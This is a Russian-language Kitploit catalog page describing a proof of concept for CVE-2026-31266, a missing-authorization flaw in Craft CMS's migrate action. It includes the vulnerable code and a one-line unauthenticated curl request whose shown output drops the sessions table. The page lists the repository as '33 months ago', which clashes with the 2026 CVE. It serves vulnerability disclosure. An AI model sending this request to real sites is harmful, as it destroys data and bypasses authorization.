Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Craftcms-PoC-CVE-2026-31266 — Безопасностное исследование механизма аутентификации Craft CMS | Kitploit
Инструменты/GitHubGitHub/0xrixet/craftcms-poc-cve-2026-31266
Аутентификация и авторизацияАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеАутентификация
GitHub0xrixet/craftcms-poc-cve-2026-31266

Craftcms-PoC-CVE-2026-31266

Безопасностное исследование механизма аутентификации Craft CMS

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
33 месяцев назадЕщё не проверено

CVE-2026-31266 - Craft CMS: Отсутствие авторизации

Информация о CVE

ПолеЗначение
CVE IDCVE-2026-31266
ВендорPixel & Tonic
ПродуктCraft CMS
Затронутые версии<= 5.9.5
CWECWE-862 (Отсутствие авторизации)
CVSS7.3 (Высокий)
Исследователь безопасности0xRIXET

Содержимое доказательств

  • screenshots/ - Демонстрации Proof of Concept

Уязвимость

  • Тип: Отсутствие авторизации
  • Воздействие: Обход аутентификации
  • Вендор: Craft CMS
  • Статус: CVE-2026-31266

Уязвимый код

Файл: src/controllers/AppController.php

Строки 65-68:

root@kitploit:~
protected array|bool|int $allowAnonymous = [
    'migrate' => self::ALLOW_ANONYMOUS_LIVE | self::ALLOW_ANONYMOUS_OFFLINE,
];

Доказательство концепции

root@kitploit:~
# With allowAdminChanges=false
curl -X POST "http://target/actions/app/migrate"

Доказательства

До атаки:

root@kitploit:~
mysql> SELECT COUNT(*) FROM sessions;
+----------+
| COUNT(*) |
+----------+
|        0 |
+----------+

После атаки:

root@kitploit:~
mysql> SELECT COUNT(*) FROM sessions;
ERROR 1146 (42S02): Table 'sessions' doesn't exist

Ссылки

  • Репозиторий Craft CMS
  • Документация по безопасности Craft
  • Запись NVD

Контакты

  • Исследователь безопасности: 0xRIXET | Mohammed Al-shehri
  • Twitter | X : @0xRIXET
  • Email: [email protected]
Скачать инструмент